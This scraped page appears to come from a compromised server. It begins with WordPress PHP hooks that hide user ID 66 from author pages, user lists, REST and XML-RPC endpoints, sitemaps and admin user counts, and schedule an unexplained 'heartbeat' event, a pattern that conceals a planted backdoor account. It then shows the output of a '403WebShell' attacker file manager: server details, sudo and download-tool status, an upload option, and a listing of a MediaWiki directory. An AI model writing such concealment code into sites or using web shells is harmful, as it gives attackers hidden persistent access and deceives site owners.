add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 66;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 66 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 66;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 66;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 66;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
403WebShell 403Webshell
Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000 ) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : / var /www /html /wiki /__MACOSX /mediawiki /includes / Upload File :
[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 19 2025 05:14:52
www-data / www-data
0755
Category
--
August 19 2025 05:14:52
deploy / www-data
0755
CommentFormatter
--
August 19 2025 05:14:52
deploy / www-data
0755
CommentStore
--
August 19 2025 05:14:52
deploy / www-data
0755
DomainEvent
--
August 19 2025 05:14:52
deploy / www-data
0755
ExternalLinks
--
August 19 2025 05:14:52
deploy / www-data
0755
Feed
--
August 19 2025 05:14:52
deploy / www-data
0755
Hook
--
August 19 2025 05:14:52
deploy / www-data
0755
HookContainer
--
August 19 2025 05:14:52
deploy / www-data
0755
Html
--
August 19 2025 05:14:52
deploy / www-data
0755
Navigation
--
August 19 2025 05:14:52
deploy / www-data
0755
Notification
--
August 19 2025 05:14:53
deploy / www-data
0755
Output
--
August 19 2025 05:14:53
deploy / www-data
0755
OutputTransform
--
August 19 2025 05:14:53
deploy / www-data
0755
ParamValidator
--
August 19 2025 05:14:53
deploy / www-data
0755
Permissions
--
August 19 2025 05:14:53
deploy / www-data
0755
RenameUser
--
August 19 2025 05:14:53
deploy / www-data
0755
Request
--
August 19 2025 05:14:52
deploy / www-data
0755
ResourceLoader
--
August 19 2025 05:14:53
deploy / www-data
0755
Rest
--
August 19 2025 05:14:53
deploy / www-data
0755
Revision
--
August 19 2025 05:14:53
deploy / www-data
0755
Settings
--
August 19 2025 05:14:53
deploy / www-data
0755
SiteStats
--
August 19 2025 05:14:52
deploy / www-data
0755
Status
--
August 19 2025 05:14:52
deploy / www-data
0755
Storage
--
August 19 2025 05:14:53
deploy / www-data
0755
StubObject
--
August 19 2025 05:14:52
deploy / www-data
0755
WikiMap
--
August 19 2025 05:14:52
deploy / www-data
0755
actions
--
August 19 2025 05:14:53
deploy / www-data
0755
api
--
August 19 2025 05:14:53
deploy / www-data
0755
auth
--
August 19 2025 05:14:53
deploy / www-data
0755
block
--
August 19 2025 05:14:53
deploy / www-data
0755
cache
--
August 19 2025 05:14:53
deploy / www-data
0755
changetags
--
August 19 2025 05:14:53
deploy / www-data
0755
collation
--
August 19 2025 05:14:53
deploy / www-data
0755
composer
--
August 19 2025 05:14:53
deploy / www-data
0755
config
--
August 19 2025 05:14:52
deploy / www-data
0755
content
--
August 19 2025 05:14:53
deploy / www-data
0755
context
--
August 19 2025 05:14:53
deploy / www-data
0755
dao
--
August 19 2025 05:14:52
deploy / www-data
0755
db
--
August 19 2025 05:14:52
deploy / www-data
0755
debug
--
August 19 2025 05:14:53
deploy / www-data
0755
deferred
--
August 19 2025 05:14:53
deploy / www-data
0755
diff
--
August 19 2025 05:14:53
deploy / www-data
0755
edit
--
August 19 2025 05:14:52
deploy / www-data
0755
editpage
--
August 19 2025 05:14:53
deploy / www-data
0755
exception
--
August 19 2025 05:14:53
deploy / www-data
0755
export
--
August 19 2025 05:14:53
deploy / www-data
0755
externalstore
--
August 19 2025 05:14:52
deploy / www-data
0755
filebackend
--
August 19 2025 05:14:53
deploy / www-data
0755
filerepo
--
August 19 2025 05:14:53
deploy / www-data
0755
gallery
--
August 19 2025 05:14:53
deploy / www-data
0755
historyblob
--
August 19 2025 05:14:52
deploy / www-data
0755
htmlform
--
August 19 2025 05:14:53
deploy / www-data
0755
http
--
August 19 2025 05:14:52
deploy / www-data
0755
import
--
August 19 2025 05:14:53
deploy / www-data
0755
installer
--
August 19 2025 05:14:53
deploy / www-data
0755
interwiki
--
August 19 2025 05:14:53
deploy / www-data
0755
jobqueue
--
August 19 2025 05:14:53
deploy / www-data
0755
json
--
August 19 2025 05:14:52
deploy / www-data
0755
language
--
August 19 2025 05:14:53
deploy / www-data
0755
languages
--
August 19 2025 05:14:53
deploy / www-data
0755
libs
--
August 19 2025 05:14:53
deploy / www-data
0755
linkeddata
--
August 19 2025 05:14:52
deploy / www-data
0755
linker
--
August 19 2025 05:14:53
deploy / www-data
0755
logging
--
August 19 2025 05:14:53
deploy / www-data
0755
mail
--
August 19 2025 05:14:53
deploy / www-data
0755
media
--
August 19 2025 05:14:53
deploy / www-data
0755
objectcache
--
August 19 2025 05:14:52
deploy / www-data
0755
page
--
August 19 2025 05:14:53
deploy / www-data
0755
pager
--
August 19 2025 05:14:52
deploy / www-data
0755
parser
--
August 19 2025 05:14:53
deploy / www-data
0755
password
--
August 19 2025 05:14:53
deploy / www-data
0755
poolcounter
--
August 19 2025 05:14:52
deploy / www-data
0755
preferences
--
August 19 2025 05:14:53
deploy / www-data
0755
profiler
--
August 19 2025 05:14:53
deploy / www-data
0755
recentchanges
--
August 19 2025 05:14:53
deploy / www-data
0755
registration
--
August 19 2025 05:14:52
deploy / www-data
0755
revisiondelete
--
August 19 2025 05:14:53
deploy / www-data
0755
revisionlist
--
August 19 2025 05:14:52
deploy / www-data
0755
search
--
August 19 2025 05:14:53
deploy / www-data
0755
session
--
August 19 2025 05:14:53
deploy / www-data
0755
shell
--
August 19 2025 05:14:53
deploy / www-data
0755
site
--
August 19 2025 05:14:52
deploy / www-data
0755
skins
--
August 19 2025 05:14:53
deploy / www-data
0755
sparql
--
August 19 2025 05:14:52
deploy / www-data
0755
specialpage
--
August 19 2025 05:14:53
deploy / www-data
0755
specials
--
August 19 2025 05:14:53
deploy / www-data
0755
telemetry
--
August 19 2025 05:14:52
deploy / www-data
0755
templates
--
August 19 2025 05:14:52
deploy / www-data
0755
tidy
--
August 19 2025 05:14:52
deploy / www-data
0755
title
--
August 19 2025 05:14:53
deploy / www-data
0755
upload
--
August 19 2025 05:14:53
deploy / www-data
0755
user
--
August 19 2025 05:14:53
deploy / www-data
0755
utils
--
August 19 2025 05:14:52
deploy / www-data
0755
watchlist
--
August 19 2025 05:14:53
deploy / www-data
0755
widget
--
August 19 2025 05:14:52
deploy / www-data
0755
xml
--
August 19 2025 05:14:52
deploy / www-data
0755
._.htaccess
0.173 KB
June 11 2025 23:35:17
deploy / www-data
0644
._AutoLoader.php
0.173 KB
July 02 2025 14:55:27
deploy / www-data
0644
._BootstrapHelperFunctions.php
0.173 KB
December 05 2024 15:41:41
deploy / www-data
0644
._Category
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._CommentFormatter
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._CommentStore
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._DefaultSettings.php
0.173 KB
December 05 2024 15:41:41
deploy / www-data
0644
._Defines.php
0.173 KB
July 02 2025 18:59:48
deploy / www-data
0644
._DevelopmentSettings.php
0.173 KB
June 11 2025 23:35:17
deploy / www-data
0644
._DomainEvent
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._EntryPointEnvironment.php
0.173 KB
December 05 2024 15:41:41
deploy / www-data
0644
._ExternalLinks
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._FeatureShutdown.php
0.173 KB
June 11 2025 23:35:17
deploy / www-data
0644
._Feed
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._GlobalFunctions.php
0.173 KB
July 02 2025 14:53:47
deploy / www-data
0644
._Hook
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._HookContainer
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Html
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._MainConfigNames.php
0.173 KB
July 02 2025 14:55:27
deploy / www-data
0644
._MainConfigSchema.php
0.173 KB
July 02 2025 14:55:27
deploy / www-data
0644
._MediaWiki.php
0.173 KB
December 05 2024 15:41:41
deploy / www-data
0644
._MediaWikiEntryPoint.php
0.173 KB
July 02 2025 14:53:47
deploy / www-data
0644
._MediaWikiServices.php
0.173 KB
July 02 2025 14:53:47
deploy / www-data
0644
._Navigation
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Notification
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Output
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._OutputTransform
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._PHPVersionCheck.php
0.173 KB
July 02 2025 14:55:27
deploy / www-data
0644
._ParamValidator
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Permissions
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._RenameUser
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Request
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._ResourceLoader
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Rest
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Revision
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._ServiceWiring.php
0.173 KB
July 02 2025 14:53:47
deploy / www-data
0644
._Settings
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Setup.php
0.173 KB
July 02 2025 14:55:27
deploy / www-data
0644
._SetupDynamicConfig.php
0.173 KB
July 02 2025 14:53:47
deploy / www-data
0644
._SiteStats
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Status
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._Storage
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._StubObject
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._WebStart.php
0.173 KB
June 11 2025 23:35:17
deploy / www-data
0644
._WikiMap
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._actions
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._api
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._auth
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._block
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._cache
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._changetags
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._collation
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._composer
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._config
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._config-schema.php
0.173 KB
July 02 2025 14:55:27
deploy / www-data
0644
._content
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._context
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._dao
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._db
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._debug
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._deferred
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._diff
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._edit
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._editpage
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._exception
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._export
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._externalstore
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._filebackend
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._filerepo
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._gallery
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._historyblob
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._htmlform
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._http
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._import
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._installer
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._interwiki
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._jobqueue
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._json
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._language
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._languages
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._libs
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._linkeddata
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._linker
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._logging
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._mail
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._media
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._objectcache
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._page
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._pager
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._parser
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._password
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._poolcounter
0.173 KB
August 08 2025 16:37:54
deploy / www-data
0755
._preferences
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._profiler
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._recentchanges
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._registration
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._revisiondelete
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._revisionlist
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._search
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._session
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._shell
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._site
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._skins
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._sparql
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._specialpage
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._specials
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._telemetry
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._templates
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._tidy
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._title
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._upload
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._user
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._utils
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._watchlist
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._widget
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
._xml
0.173 KB
August 08 2025 16:37:55
deploy / www-data
0755
Youez - 2016 - github.com/yon3zuLinuXploit